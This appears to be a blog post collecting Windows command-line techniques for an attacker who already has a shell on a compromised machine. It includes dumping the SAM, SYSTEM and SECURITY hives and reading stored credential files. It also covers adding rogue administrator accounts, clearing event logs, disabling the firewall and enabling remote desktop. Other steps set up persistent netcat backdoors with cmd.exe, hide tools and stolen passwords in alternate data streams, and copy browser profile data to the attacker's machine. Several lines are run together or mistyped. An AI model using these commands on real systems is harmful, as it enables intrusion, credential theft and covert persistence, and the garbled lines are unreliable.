The following is a list of helpful tools, articles and commands you can use in a situation where you’ve compromised a Windows machine and have a command shell, but are unable to use Meterpreter for whatever reason. There are several articles out there that list different commands but I wanted to put them all in one place. It’s a work in process.
Basic commands
dir d:
dir astricks.exe
dir /ah: view hidden files and dirs
dir /r: display alt data streams
dir ..\otherdir
dir d:\fldr\otherfldr
dir /A:H
dir/ah
dir ..\otherdir
ren a.txt b.txt: rename file
attrib a.txt +h: make file hidden
Query information about the system, network/network connections, running services and services that run upon startup
systeminfo: lists information about system
ipconfig/all: query ip configuation
ipconfig /displaydns
arp /a: check out viable targets
fsutil fsinfo drives: Query current drives on the system
Grab SAM and SYSTEM files
type “C:/windows/repair/SAM”
type “C:/windows/repair/SYSTEM”
Tasks
tasklist /svc: lists running processes
taskkill /PID <process ID> /F : forcibly kill task
taskkill taskkill /PID xxx taskkill /IM name* of process to be terminated * can be used to kill all processes with same name
netstat -ano : to see what services are running on what ports
netstat -bano
netstat -r
netstat -na | findstr :443
nslookup: query server information
nbtstat: Displays protocol stats and current TCP/IP connections using NetBIOS over TCP/IP
Query information about server and workstation, Workstation domain name and Logon domain
net config server
net config workstation
net share: view shared resources on network
Change drive to different drive letter
ex change to D:/ directory and list it’s contents:
d: & dir
cd /d d: & dir
Cat contents of file located in D:/ directory
cd /d & type d:\blah\blah
net view
net view /domain[:DomainName]
net view \\computerName
arp /a
Query user information
whoami
whoami: view logged on user
whoami /all: lists privileges
whoami /user
whoami /groups
whoami /priv
net user: list users
For more info on a user:
net user <username> (for local user)
net user <username> /domain (for a domain user)
net accounts
net accounts /domain
net logalgroup administrators
net localgroup administrators /dmain
net group “domain Admins” /domain
net group “Enterprise Admins” /domain
arp -a: Lists all the systems current in the machine’s ARP table
route print: Prints machines routing table
type “C:\documents and settings\administrator\userdata\index.dat”
Add user:
net users <username> <password> /add
Add user to local administrators group:
net localgroup administrators <username> /add
Delete a user:
net users username /delete /domain
Change user’s password:
net users <username> <new_password>
View domain admins:
net group “Domain Admins” /domain
View name of domain controller:
reg query “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\History” /v DC
Query group information:
net view /localgroup
net localgroup Administrators
net localgroup /Domain
gpresult: view group policy
gupdate: update group policy
gpresult /z
type %WINDIR%\System32\drivers\etc\hosts: view contents of hosts files
Remote System Access
● net share \\computername
● tasklist /V /S computername
● qwinsta /SERVER:computername
● qprocess /SERVER:computername *
● net use \\computername (maps IPC$ which does not show up as a drive)
● net use \\computername /user:DOMAINNAME\username password ○ (maps IPC$ under another username)
● net time \\computername (Shows the time of target computer)
● dir \\computername\share_or_admin_share\ (dir list a remote directory)
● tasklist /V /S computername
○ Lists tasks w/users running those tasks on a remote system. This will remove any IPC$ connection after it is done so if you are using another user, you need to re-initiate the IPC$ mount
Reg Command
reg save HKLM\Security security.hive (Save security hive to a file)
reg save HKLM\System system.hive (Save system hive to a file)
reg save HKLM\SAM sam.hive (Save sam to a file)=
reg add [\\TargetIPaddr\] [RegDomain][ \Key ]
reg export [RegDomain]\[Key] [FileName]
reg import [FileName ]
reg query [\\TargetIPaddr\] [RegDomain]\[ Key ] /v [Valuename!] (you can to add /s for recurse all values )
Deleting Logs
wevtutil el (list logs)
wevtutil cl
Uninstalling Software
wmic proud get name /value: gets software names
wmic product where name=”XXX”: call uninstall /Interactive:Off: unintalss software
Permissions:
icacls
Grant full access over directory and encompassing folders and files:
icacls “C:\windows” /grant Administrator:F /T
icacls “C:\” /grant “nt authority\system”: F /T
net use: Map network shares
Mount a remote share with the rights of the current user:
net use K: \\<ip>\<share>
dir K:
Netcat
Create listener on linux nc -l -p 6996 /bin/sh/Create a persistent backdoor on windows nc -L -p 6996 -e c:\windows\system32\cmd.exeOn attacking system: nc ip 6996transfer file on victim: nc -L -p 6996 > virus.exe on attacker nc ip 6996 < virus.exeAdd registry key to allow netcat through the firewayy on UDP port 4444reg add HKLM\\software\\microsoft\\windows\\ currentversion\\run –d ‘C:\windows\system32\nc.exe -udp 4444 -e cmd.exe’ –v netcat
reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f
Alternatively
Allow service through firewall
netsh.exe firewall set portopening tcp 123 MYSERVICE enable all
netsh.exe firewall set allowedprogram C:\MYPROGRAM.exe
HKLM\\software\\microsoft\\windows\\ currentversion\\run –d ‘C:\windows\system32\nc.exe -Ldp 4444 -e cmd.exe’ –v netcat
netsh firewall set allowedprogram c:\nc.exe allow_nc ENABLE
Other Firewall commands
Query state of firewall:
netsh firewall show state
Disable firewall
netsh.exe firewall set opmode mode=disable profile=all
nslookup
net logalgroup
arp /a
ipconfig
netstat
Create listener on linux
nc -l -p 6996 /bin/sh/
Create a persistent backdoor on windows
nc -L -p 6996 -e c:\windows\system32\cmd.exe
On attacking system:
nc ip 6996
transfer file
on victim:
nc -L -p 6996 > virus.exe
on attacker
nc ip 6996 < virus.exe
Files
Symbolic links
Make file or dir that exists somewhere appear to exist somewhere else
Can make c:\windows appear in the root of web server and bypass sec restrictions
ex
mkdir \testing
cd \testing
mklink /D blah c:\testing
dir /s blah<astrick.astricks>
ALT Data Streams(ADS)
Use to hide malicious files from view
Add file data into existing files w/o affecting their functionality, size or display in utilities
ex
upload image
echo I need to hide this > hideme.txt
type hideme.txt > logo.png:myads.txt
del hideme.txt
view contents of ADS
notepad logo.png:myads.txt
To look for ADS
dir /r
ex
echo “Main file” > c:\main.txt
echo “this is the stream” > c:\main.txt:strm.txt
dir /s windows > c:\main.txt:dir.txt
notepad c:\main.txt
notepad c:\main.txt:strm.txt
notepad c:\main.txt:dir.txt
del c:\main.txt
dir.txt= contains entire win directory sturcture
Set up Alt datastream to steal passwords and feed them back to you
To hide nc using alt data stream
mklink bd.exe c:\testing\main.txt:nc.exe
mklink passwds c:\testing\main.txt:pw.txt
bd -l -p 9000 < passwds
del bd.exe
del passwds
To display contents of alt data stream fr command line
more < c:\main.txt:strm.txt
Hide files and find those that are hidden:
dir
/A = attributes
H = hiddenfiles
dir /AH
dir /R display alt data streams
S = display files in dir and all subdirectories
Services
services.msc
View all svs
net start
Start service
ex
start print spooler
net start “print spooler” / net stop “print spooler”
Query services
sc query
sc query state= inactive
sc query state= all
Query config of print spooler svs
sc qc spooler
sc start spooler
sc stop spooler
Disable/enable svs at start
sc config spooler start= disabled
sc config spooler start= auto
sc start
- boot : device driver loaded by boot loader
- system: devise driver started during kernel initialization
- auto: auto starts
- demand: svs must be manually started
-
ServicesView list processes started upon startupnet startsc querywmic startup get caption,commandQuery, Stop/Start/Pause Installed Servicessc query state= allsc query <service>sc <stop> <service>
qwinsta: Query info about RDP sessions
qprocess*: Similar to tasklist but easier to read
at: Query current scheduled tasks
schtasks: Query scheduled tasks that your current user has access to see.
set
schtasks /query /fo csv /v > %TEMP%
WMIC
wmic useraccount
wmic startup get caption,command
Process mgmnt via WMIC
create process
wmic process call create svs.exe
List processes
wmic process list brief
wmic process where (name = “svs.exe”) list brief
wmic process where (name = “svs.exe”) list full
Kill process
wmic process where (name = “svs.exe”) delete
WMI
wmic bios
wmic qfe
wmic qfe get hotfixid (This gets patches IDs)
wmic startup
wmic service
wmic os
wmic process get caption,executablepath,commandline
wmic process call create “process_name” (executes a program)
wmic process where name=”process_name” call terminate (terminates program)
wmic logicaldisk where drivetype=3 get name, freespace, systemname, filesystem, size, volumeserialnumber (hard drive information)
wmic useraccount (usernames, sid, and various security related goodies)
wmic useraccount get /ALL
wmic share get /ALL (you can use ? for gets help ! )
wmic startup list full (this can be a huge list!!!) ● wmic /node:”hostname” bios get serialnumber (this can be great for finding warranty info about target)
Other potentially useful misc commands
pkgmgr usefull /iu :”Package”
pkgmgr usefull /iu :”TellnetServer”: install telnet service
pkgmgr /iu:”TelnetClient”
rundll32.exe user32.dll, LockWorkStation: locks the screen
wscript.exe <script js/vbs>
cscript.exe <script js/vbs/c#>
xcopy /C /S %appdata%\Mozilla\Firefox\Profiles\*.sqlite \\your_box
Enable remote desktop
reg add “HKLM\System\CurrentControlSet\Control\TermServer” /v fDenyTSConnections /t REG_DWORD /f
net session: list session information
type “c:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Credentials”
cd “C:/Documents and settings\administrator\userdata” & dir
type “c:\Documents and Settings\Administrator\Desktop\UserMysql.txt”
type “c:\Documents and Settings\Administrator\Application Data\MySQL\mysqlx_user_connections.xml”
type “C:\documents and settings\administrator\userdata\index.dat”
Bit Belle 